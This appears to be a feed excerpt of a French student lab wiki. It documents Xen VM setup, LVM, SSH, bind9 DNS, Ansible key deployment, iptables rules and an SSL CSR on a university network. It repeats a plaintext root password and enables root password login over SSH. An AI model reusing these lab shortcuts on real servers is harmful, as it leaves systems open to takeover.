Dans keys.j2 :&lt;br /&gt;
  {% for item in ssh_keys %}&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;{{ item.key }}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
Ajout d'une clef dans les variables de groupe group_vars/all.yaml :&lt;br /&gt;
 &lt;br /&gt;
 ssh_keys:&lt;br /&gt;
  # if you don't install this i won't be able to get into your nodes to help you debug :)&lt;br /&gt;
  - name: tmaurice@thonkpad&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad&lt;br /&gt;
    # add more keys here&lt;br /&gt;
  - name: aviran.tetia@polytech-lille.net&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis lancer la commande :&lt;br /&gt;
&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
Vérification dans le fichier /root/.ssh/authorized_keys  :&lt;br /&gt;
 &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Nous obtenons bien toutes nos clefs ssh.&lt;br /&gt;
&lt;br /&gt;
Ajout des var d'environement pour pouvoir installer docker :&lt;br /&gt;
&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Installation du rôle Docker :&lt;br /&gt;
 &lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Puis dans polytech.yml :&lt;br /&gt;
&lt;br /&gt;
 - hosts: all&lt;br /&gt;
   roles:&lt;br /&gt;
    ...&lt;br /&gt;
    - geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après ré-execution du playbook, nous pouvons vérifier que Docker est bien installé : &lt;br /&gt;
&lt;br /&gt;
 docker -v &lt;br /&gt;
&lt;br /&gt;
Installation du Pare-feu :&lt;br /&gt;
&lt;br /&gt;
source : https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
&lt;br /&gt;
- création de roles/iptables/tasks/main.yml :&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT tcp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: tcp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_tcp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT udp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: udp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_udp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Set the policy for the INPUT chain to DROP&lt;br /&gt;
  ansible.builtin.iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    policy: DROP&lt;br /&gt;
&lt;br /&gt;
- Cration du fichier de variables :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_tcp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8500&lt;br /&gt;
  - 8501&lt;br /&gt;
  - 8502&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 8300 &lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_udp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58076</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58076"/>
				<updated>2022-01-12T16:25:04Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* HTTPS / Certificat SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
==Configuration du SSH== &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
==Configuration du DNS==&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
Note : Après avoir constaté que le serveur secondaire ne se mettait pas à jour après chaque &amp;quot;notify&amp;quot; du serveur primaire, nous avons finalement choisi d'utiliser le serveur ns1.belle-rose.site en tant que serveur secondaire. &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.local:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.local&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Nous avons séparés configuration des serveurs autorisés à dupliqué nos zones de la config de nos zones en insérant les acl suivantes dans le fichier /etc/bind/named.conf. &lt;br /&gt;
&lt;br /&gt;
 options {&lt;br /&gt;
	 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
	 dnssec-validation auto;&lt;br /&gt;
 	 dnssec-enable yes;&lt;br /&gt;
	 dnssec-lookaside auto;&lt;br /&gt;
	 listen-on-v6 { any; };&lt;br /&gt;
	 allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40; //@ de ns6.gandi.net mais plus utilisé au final&lt;br /&gt;
   193.48.57.181; //@ de ns1.belle-rose.site&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns1.belle-rose.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns1.belle-rose.site.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
==HTTPS / Certificat SSL==&lt;br /&gt;
Nous avons ensuite procéder à la création des certificats SSL.&lt;br /&gt;
Nous sommes donc aller sur Gandi, acheter un certificat.&lt;br /&gt;
Pour cela nous avons généré un CSR avec la commande :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout paixdieu.site.key -out paixdieu.site.csr&lt;br /&gt;
&lt;br /&gt;
-newkey tsa:2048 permet de générer une requête CSR et une clé privée utilisant le chiffrement RSA sur 2048 bits.&lt;br /&gt;
&lt;br /&gt;
-keyout paixdieu.site.key permet de sauvegarder le fichier de clé privée sous le nom &amp;quot;paixdieu.site.key&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
-out paixdieu.csr permet de sauvegarder le fichier CSR sous le nom &amp;quot;paixdieu.csr&amp;quot;. &lt;br /&gt;
